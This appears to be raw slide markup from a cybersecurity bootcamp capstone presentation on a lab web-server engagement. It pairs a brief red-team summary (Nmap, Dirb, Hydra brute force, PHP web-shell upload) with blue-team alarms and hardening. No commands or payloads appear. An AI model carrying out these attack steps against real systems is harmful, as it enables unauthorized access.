                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Or else, do not trigger..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8" name="Google Shape;1338;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171450" y="1800150"/>
            <a:ext cx="3419400" cy="2655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 can be set on the host to block unwanted access?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Access to the sensitive file can be locally restricted to a specific user.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This way, someone who gets a shell as, e.g., www-data will not be able to read it.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In addition, the file should be encrypted at rest.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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="584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44" name="Google Shape;1344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82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604700"/>
            <a:ext cx="3828900" cy="27525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alarm can be set to detect future brute force attacks?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# of Requests per Second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threshold would you set to activate this alarm?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More than 100 requests per second for 5 seconds should trigger the alarm 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346" name="Google Shape;1346;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009450" y="1765425"/>
            <a:ext cx="3755700" cy="2360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 can be set on the host to block brute force attacks?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Configuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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fail2ban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or a similar utility would mitigate brute force attacks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solution. If possible, provide the required command line(s).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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="641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352" name="Google Shape;1352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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282525" y="1602450"/>
            <a:ext cx="4003500" cy="30444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alarm can be set to detect future access to this directory?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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor access to webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with Filebeat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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fire an alarm on any read performed on files within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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webdav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threshold would you set to activate this alarm?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Simply fire the alarm whenever someone accesses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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webdav </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directory.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Ideally, allow valid IP addresses.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354" name="Google Shape;1354;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4945800" y="1678650"/>
            <a:ext cx="3540900" cy="23895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 can be set on the host to control access?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Administrators must install and configure Filebeat on the host.</a:t>
            </a:r>
            <a:endParaRPr sz="1000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solution. If possible, provide the required command line(s).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60" name="Google Shape;1360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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346175" y="1604700"/>
            <a:ext cx="3899400" cy="31230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alarm can be set to detect future file uploads?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Alarms should fire upon receipt of any POST request containing form or file data of a disallowed file type, for example php</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="741B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threshold would you set to activate this alarm?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741B4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400"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The alarm should fire whenever users upload a forbidden file.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="741B47"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1362" name="Google Shape;1362;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4789600" y="1713375"/>
            <a:ext cx="3419400" cy="26730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configuration can be set on the host to block file uploads?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Write permissions can be restricted on the host.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Uploads can be isolated into a dedicated storage partition.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="741B47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200"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="741B47"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filebeat should be enabled and configured.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solution. If possible, provide the required command line.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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9156300" cy="6486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Group Project Members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1368" name="Google Shape;1368;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="9156300" cy="6789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University of Minnesota Cyber Security Bootcamp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600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Group 2 (FUBAR)</a:t>
            </a:r>
            <a:endParaRPr sz="1400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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="648600"/>
            <a:ext cx="9144000" cy="550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Project was created and completed as a team project by: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1370" name="Google Shape;1370;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375100" y="1412500"/>
            <a:ext cx="7232100" cy="318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80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Carraher Matt</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Harmon LI</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Kerongo Jacquie</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Lall Mahendra</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Lund Jim</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Osman Ikram</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Peterson Nick</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Stanford Ian</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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Teizazu Bonssa</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="3657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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wald Mallory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380" name="Google Shape;138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Sources used in the Project 2 Capstone Engagement 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381" name="Google Shape;1381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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230450" y="1262075"/>
            <a:ext cx="8377800" cy="3159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i="1" lang="en" sz="1100"/>
              <a:t>“IP Tables: Ultimate Guide to Linux Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>.” PhoenixNAP. 28 January, 2020. </a:t>
            </a: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Iptables Tutorial: Ultimate Guide to Linux Firewall (phoenixnap.com)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i="1" lang="en" sz="1000"/>
              <a:t>“How to Disable Directory Listing in Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>TechAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>18 May, 2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a: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Disable Directory Listing in Apache – TecAdmin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000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1000"/>
              <a:t>How to Prevent Brute Force Attacks with 8 Easy Tactics.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>” PhoenixNAP. 03 December, 2018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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https://phoenixnap.com/kb/prevent-brute-force-attacks</a:t>
            </a:r>
            <a:endParaRPr sz="11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rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="1125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i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“Secure File Upload Best Practices: Blocking Malicious File Uploads.”</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="36363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rgbClr val="363636"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Filestack 12 February, 2019.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="36363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https://blog.filestack.com/thoughts-and-knowledge/secure-file-upload/</a:t>
            </a:r>
            <a:endParaRPr sz="11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8" name="Google Shape;1058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9" name="Google Shape;10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50" y="661375"/>
            <a:ext cx="6610024" cy="3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975" y="888151"/>
            <a:ext cx="1964400" cy="37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{491C564A-FB1D-4377-BAEA-345949156226}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192.168.1.0/24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Gateway: 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Netmask: 255.255.255.0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242025" y="533700"/>
            <a:ext cx="8684400" cy="381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-25" y="974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{491C564A-FB1D-4377-BAEA-345949156226}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3069375"/>
                <a:gridCol w="2618900"/>
                <a:gridCol w="2618900"/>
              </a:tblGrid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269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 port scanning is enabled hence;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 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OWASP Top 10_position #3 vulnerability.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1B47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Secret_Folder directory is open to public even if it contains sensitive data authorized to Personnel Department only. </a:t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1B47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ran Nmap port scan to reveal open ports and services</a:t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 of the secret_folder directory and the connect_to_corp_server file compromised the credentials of the WebDAV folder.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Any malicious attacker can break into the Web Server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7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 is very critical.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enabled on Apache Web Server.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1B47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enabled on Apache Web Server; any User can use the browser to read full contents of directories on capstone. </a:t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</a:rPr>
                        <a:t>The web server allows users to upload arbitrary files — specifically, PHP scripts. This exposes the machine to the wide array of attacks enabled by malicious files.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="134F5C"/>
                        </a:solidFill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Assessment_(CONT.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;109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3541500" cy="13965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92" name="Google Shape;1092;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1962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{491C564A-FB1D-4377-BAEA-345949156226}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3333050"/>
                <a:gridCol w="2650200"/>
                <a:gridCol w="2650200"/>
              </a:tblGrid>
              <a:tr h="3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59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through command injection.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OWASP TOP 10_position # 1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41B47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upload web shells and achieve arbitrary remote code execution on the web server using PHP scripts to execute shell commands.</a:t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4F5C"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buChar char="❖"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="134F5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Due to unauthorized file upload vulnerability; malicious attackers can upload web shells and achieve arbitrary remote code execution on the web server using command injection.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 severe vulnerabilities include:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="1155C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3763"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Roboto"/>
                        <a:buChar char="❖"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Lack of mitigation against brute force attacks</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="07376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3763"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buChar char="❖"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:srgbClr val="07376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authentic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="07376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ation for sensitive data, e.g., secret_folder</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="07376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3763"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buChar char="❖"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="07376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Plaintext protocols (HTTP and</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="07376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73763"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buChar char="❖"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="07376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WebDAV)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="134F5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741B4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[Sensitive Data Exposure]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781275" y="1480575"/>
            <a:ext cx="2371500" cy="29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and processes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Nmap used to find hosts on a Network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Dirb used to scan hidden or existing Web Objects.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Web Browser to explore or retrieve information from other parts of the Web.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2" name="Google Shape;110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05" name="Google Shape;110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6" name="Google Shape;110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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1655500"/>
            <a:ext cx="24285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The exploit </a:t>
            </a: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revealed</a:t>
            </a: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 a secret_folder directory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The Directory is password protected but vulnerable to brute-force attacks.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Used Hydra password cracking tool to access password wordlists via open port 80.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9" name="Google Shape;1109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6429675" y="143152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Aftermath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The login prompt discloses that the User is Ashton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This information is used to run a brute-force attack and steal confidential data.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Font typeface="Roboto"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="12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We were able to gain unauthorized access the company’s secret folders remotely using Hydra password cracking tool.</a:t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